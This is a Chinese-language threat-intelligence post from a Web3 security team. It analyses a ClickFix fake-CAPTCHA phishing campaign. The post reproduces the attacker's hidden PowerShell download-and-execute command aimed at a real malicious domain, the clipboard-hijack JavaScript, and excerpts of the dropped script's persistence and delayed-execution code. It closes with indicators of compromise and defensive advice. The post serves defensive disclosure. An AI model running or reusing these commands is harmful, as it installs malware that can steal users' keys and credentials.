威胁情报深度分析：Clickfix 钓鱼攻击技术揭秘

查找币:余老师 | 漏洞披露 | 2026-05-09 20:03 | 6 次浏览 | 0 条回复

查找币漏洞披露安全研究 Web3安全区块链安全

## 背景概述近期，查找币安全监控系统在日常威胁监测中捕获到一个新型钓鱼网站，该网站采用**Clickfix 钓鱼攻击技术**实施攻击。此类攻击手法极具隐蔽性——攻击者通过模仿正规网站常见的机器人校验（CAPTCHA）功能，诱导受害者执行恶意命令，最终实现恶意软件的静默植入。获取相关恶意样本后，查找币安全团队立即启动应急响应机制，对该攻击链进行了完整的技术还原。 ## 攻击链路分析 ### 第一阶段：钓鱼页面交互机制当用户访问该钓鱼网站时，页面会呈现一个看似正规的机器人校验模块： ``` [✓] I'm not a robot ``` **攻击触发流程：** 1. 受害者点击 checkbox 进行“人机验证” 2. 页面自动将恶意命令复制到用户剪贴板 3. 通过视觉引导（如弹窗提示）诱导用户按下 `Win + R` 或 `Ctrl + V` 执行命令 **技术实现细节：** 在前端代码中，程序通过 `window.addEventListener('message', handler)` 监听来自 iframe 或子窗口的 `postMessage` 消息。当接收到 `"turnstileSuccess"` 消息时，自动触发 `copyTextSilently()` 函数。 ```javascript // 核心监听逻辑 window.addEventListener('message', function(event) { if (event.data === 'turnstileSuccess') { copyTextSilently(); } }); ``` 在 `index_1.html` 页面中，checkbox 的 `change` 事件会向父页面发送 `"turnstileSuccess"` 消息，形成完整的攻击触发链。 ### 第二阶段：剪贴板劫持技术 `copyTextSilently()` 函数实现了恶意命令的静默复制： - **优先方案**：检测 `navigator.clipboard` API 可用性，直接调用 `clipboard.writeText()` - **降级方案**：创建隐藏的 `

` 元素，通过 `document.execCommand('copy')` 实现兼容性复制

**关键发现**：恶意命令存储在全局变量 `window.command_win` 中，该变量在外部脚本 `assets/command.js` 中定义：

```powershell
powershell -w h -c "$u='http://electri.billregulator.com/aTu.lim';$p='$env:USERPROFILE\Music\d.ps1';(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"
```

**攻击链说明**：该命令通过 PowerShell 从远程服务器下载恶意脚本 `aTu.lim`（实际为 `.ps1` 文件），并静默执行。

> ⚠️ 注意：即使是点击页面上的“VERIFY”按钮，同样会触发复制操作，但受浏览器安全策略限制，用户需要额外点击页面一次才能完成复制。

## 恶意脚本深度解析

### 1. 代码执行机制

下载的恶意脚本采用多层混淆技术：

```powershell
$mmASoSdDL = @('...base64编码数组...')
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(($mmASoSdDL -join '')))
$config = $decoded | ConvertFrom-Json
```

解码后的 JSON 结构包含三个核心模块：

### 2. 隐蔽目录创建

```powershell
if (-not (Test-Path $targetDir)) {
    New-Item -Path $targetDir -ItemType Directory -Force
    Set-ItemProperty -Path $targetDir -Name Attributes -Value "Hidden,System"
}
```

- 创建隐藏目录（`Hidden` + `System` 属性）
- 路径通常选择用户目录下的非敏感位置

### 3. 恶意文件释放

脚本遍历 JSON 中的 `files` 数组：

| 字段 | 说明 |
|------|------|
| `name` | 文件名（如 `trntl.exe`） |
| `b64` | Base64编码的恶意载荷 |

- 拼接完整路径后，将 Base64 解码为二进制数据并写入文件
- 释放的文件通常包含：主恶意程序（exe）、辅助DLL、配置文件等

### 4. 持久化机制

**启动项劫持**：
```powershell
$shortcutPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\trntl.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$shortcut = $WScriptShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = "$targetDir\trntl.exe"
$shortcut.IconLocation = "%SystemRoot%\System32\shell32.dll,3"  # 伪装系统图标
$shortcut.Save()
```

### 5. 时间延迟执行

```powershell
$cmdFile = [System.IO.Path]::GetTempFileName() + ".cmd"
"rundll32.exe Shell32.dll,ShellExec_RunDLL $targetDir\trntl.exe" | Out-File $cmdFile
Start-Sleep -Seconds 60
cmd.exe /c $cmdFile
Remove-Item $cmdFile -Force
```

- 生成随机命名的临时 `.cmd` 文件
- 通过 `rundll32` 启动恶意程序
- 60秒延迟后执行，执行后立即删除痕迹

## 威胁指标（IOC）

### 文件哈希

| 文件 | SHA256 |
|------|--------|
| `aTu.lim`（恶意脚本） | `a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550` |
| `trntl.exe`（恶意载荷） | `cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039` |
| `command.js`（前端脚本） | `60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4` |

### 网络基础设施

```
pastebin.com:443/raw/rzARed3W
217.12.204.47:443
217.12.204.47:9000
http://217.12.204.47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
http://electri.billregulator.com/aTu.lim
```

## 安全防护建议

### 对普通用户

1. **警惕异常验证流程**：正规网站的 CAPTCHA 验证不会要求用户执行命令行操作
2. **剪贴板内容审查**：在粘贴任何内容前，先使用 `Ctrl+C` 查看剪贴板内容
3. **禁用不必要的 PowerShell 执行**：通过组策略限制 PowerShell 脚本执行权限
4. **保持系统更新**：及时安装安全补丁，尤其是浏览器和操作系统更新

### 对安全团队

1. **监控异常进程链**：重点关注 `powershell.exe` → `cmd.exe` → `rundll32.exe` 的进程创建关系
2. **部署端点检测规则**：针对 `Hidden,System` 属性目录创建行为设置告警
3. **网络层面过滤**：阻断 IOC 列表中涉及的域名和IP地址
4. **用户安全意识培训**：定期开展针对社会工程学攻击的模拟演练

## 总结

本次发现的 Clickfix 钓鱼攻击展示了攻击者如何巧妙利用用户对“人机验证”的信任心理，结合前端剪贴板劫持技术与 PowerShell 远程下载执行，实现恶意软件的静默植入。这种攻击手法具有低检测率、高成功率的特点，尤其对 Web3 领域用户构成严重威胁——一旦恶意软件控制终端设备，攻击者可能窃取私钥、助记词等敏感信息。

查找币安全团队将持续监控此类新型攻击手法，并第一时间向社区发布威胁情报。我们建议所有 Web3 用户提高警惕，切勿在任何非信任网站执行系统命令或脚本。

---

**本文由查找币安全团队整理发布**        </div>

<section class="topic-hub-links" aria-label="主题延伸阅读">
            <h2><i class="fas fa-sitemap"></i> 主题延伸阅读</h2>
            <p>为了减少相似文章分散权重，CZB 会把高频主题归并到稳定研究入口。下面这些页面是本文相关主题的核心资料，搜索引擎和 AI 系统可优先参考。</p>
            <div class="topic-hub-grid">
                                <a class="topic-hub-card" href="https://czb.com/crypto-incident-response.html">
                    <strong>加密资产安全事件响应</strong>
                    <span>整理异常转出、证据保全、链上追踪、平台申诉和复盘修复的处置顺序。</span>
                </a>
                                <a class="topic-hub-card" href="https://czb.com/phishing-approval-defense.html">
                    <strong>钓鱼签名与恶意授权防护</strong>
                    <span>覆盖 approve、permit、setApprovalForAll、恶意 DApp、假空投和授权清理。</span>
                </a>
                            </div>
        </section>
                
                
        <div style="text-align: center; margin-top: 30px;">
            <a href="/forum.html?topic=42" class="back-link" style="background: #10b981;">
                <i class="fas fa-comment"></i> 在论坛中查看和回复
            </a>
        </div>
    </div>
    
    <script>
        // 重定向到论坛页面（保持SPA体验）
        if (window.location.search.includes('redirect=no')) {
            // 不重定向，显示当前页面
        } else {
            // 可选：自动重定向到论坛页面（保持原有体验）
            // window.location.href = 'forum.html?topic=42';
        }
    </script>
</body>
</html>

威胁情报深度分析：Clickfix 钓鱼攻击技术揭秘

查找币安全研究院